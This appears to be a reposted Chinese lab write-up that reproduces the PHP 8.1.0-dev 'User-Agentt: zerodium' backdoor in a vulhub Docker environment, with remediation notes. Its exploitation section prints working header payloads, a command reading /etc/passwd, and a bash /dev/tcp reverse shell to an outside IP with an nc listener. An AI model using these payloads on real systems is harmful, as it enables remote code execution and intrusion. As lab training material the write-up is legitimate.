文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

PHP-8.1.0-dev 后门命令执行漏洞复现

2023-09-02 06:14

关注

文章目录

1.1 PHP

想必大家都了解,这里就不过多赘述了

1.2 漏洞简述

PHP 版本 8.1.0-dev 于 2021 年 3 月 28 日发布了带有后门的版本,但该后门很快被发现并删除。如果此版本的 PHP 在服务器上运行,攻击者可以通过发送 User-Agentt 标头来执行任意代码。

发现问题后恢复了原代码,但随后又被篡改了第二次。该漏洞将在任何运行受感染版本的 PHP 的网站中创建一个后门,使黑客能够在该网站上执行远程代码执行。

1.4 影响范围

PHP 8.1.0-dev

1.5 漏洞详情

2.1 方案一: vlufocus在线平台

登录vlufocus官网,搜索漏洞名称并启动

在这里插入图片描述

2.2 方案二: 在docker中搭建

在GitHub中搜索并下载vulhub

git clone https://github.com/vulhub/vulhub.git

  1. 进入漏洞目录,打开Powershell
    vulhub-master/php/8.1-backdoor/

  2. 使用docker-compose拉取漏洞环境
    docker-compose up -d

  3. 显示绿色的done表示搭建成功
    Done

    在这里插入图片描述

2.3 访问测试

这里采用方案二

在这里插入图片描述

3.1.1 信息收集

  1. 使用nmap进行端口扫描

    在这里插入图片描述

  2. 进一步扫面,发现php版本

    在这里插入图片描述

  3. 在Exploit_DB库中搜索相关漏洞

    在这里插入图片描述

3.1.2 漏洞利用

POC脚本信息:

Exploit Title: PHP 8.1.0-dev Backdoor Remote Code ExecutionDate: 23 may 2021  Exploit Author: flast101  Vendor Homepage: https://www.php.net/  Software Link: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor  Tested on version: 8.1.0-dev  CVE : N/A  Vulnerability references:  https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a  https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
  1. 加载利用代码,在虚拟机中配置好python环境并运行

    ┌──(user㉿kali)-[~/Documents]└─$ python3 backdoor_php_8.1.0-dev.pyEnter the host url:http://a.b.c.dInteractive shell is opened on http://a.b.c.d Can't acces tty; job crontol turned off.$ iduid=1000(user) gid=1000(user) groups=1000(user)
  2. Reverse Shell

        ┌──(user㉿kali)-[~/Documents]    └─$ python3 revshell_php_8.1.0-dev.py   

    在这里插入图片描述

  1. 改包用的payload

    第二个直接获取账户信息,这里自由发挥吧

    User-Agentt: zerodiumvar_dump(2*3)
    User-Agentt: zerodiumsystem(“cat /etc/passwd”)

  2. 建立监听

nc -lvp 192.168.0.118:8080

  1. 反弹Shell

    Payload如下:

User-Agentt: zerodiumsystem(“bash -c ‘exec bash -i >& /dev/tcp/192.168.0.116/6666 0>&1’”);

这时监听机应该就应该建立连接了Getshell!

将PHP更新至8.2.0及以上版本
2.官网重新下载安装一下应该也可以,因为后门已经被清除了、

没啥可说的,是一个无聊的漏洞

https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor (偷个懒,好敷衍的reference…)

东塔网络安全学院. (2021) ‘PHP-8.1.0-dev 后门命令执行漏洞复现’, CSDN, 20 Feb. Available at: https://blog.csdn.net/m0_48520508/article/details/…(Accessed: 22 Aug 2022).

来源地址:https://blog.csdn.net/Shadow_DAI_990101/article/details/126772748

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯